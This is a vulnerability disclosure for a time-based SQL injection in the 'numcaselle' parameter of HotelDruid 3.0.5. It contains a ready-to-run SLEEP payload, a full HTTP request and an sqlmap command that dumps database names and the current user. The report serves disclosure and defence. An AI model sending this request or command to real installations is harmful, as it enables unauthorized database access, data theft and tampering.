Affected Version: hoteldruid version 3.0.5

Product Link: https://www.hoteldruid.com/

Product Download Link: https://www.hoteldruid.com/download/hoteldruid_3.0.5.zip

Security Issue:

SQL injection via POST parameter numcaselle 

URL: <http://localhost/hoteldruid/creaprezzi.php>
Method: POST
Vulnerable Parameter: numcaselle
Payload: 1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm

Vulnerability Description:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.

Process to reproduce:

1. Copy the HTTP Request below
2. Save the file as sqli.txt 
3. Run the sqlmap command below to see the extracted data from the database

HTTP Request:

POST /hoteldruid/creaprezzi.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: <http://localhost/hoteldruid/>
Content-Length: 5575
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="anno"

2023
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id_sessione"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="numcaselle"

1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="tipotariffa"

tariffa1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo1"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo1"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo1"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo1p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo2"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo2"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo2"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo2p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo3"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo3"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo3"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo3p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo4"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo4"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo4"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo4p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo5"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo5"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo5"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo5p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo6"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo6"

2023-01-24
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo6"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo6p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo7"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo7"

2023-01-24
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo7"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo7p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo8"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo8"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo8"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo8p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo9"

2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo9"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo9"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo9p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo10"

2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo10"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo10"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo10p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo11"

2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo11"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo11"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo11p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo12"

2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo12"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo12"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo12p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo13"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo13"

2023-01-23
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo13"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo13p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo14"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo14"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo14"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo14p"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica"

1
------------YWJkMTQzNDcw--

HTTP Response:

Untitled

Proof of Exploit:

SQL query - SELECT database()
hoteldruid

Screenshot:

Untitled

Command used: sqlmap -r sqli.txt -p numcaselle --risk 3 --level 5 --dbs --current-user --current-db

The impact of this vulnerability:

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.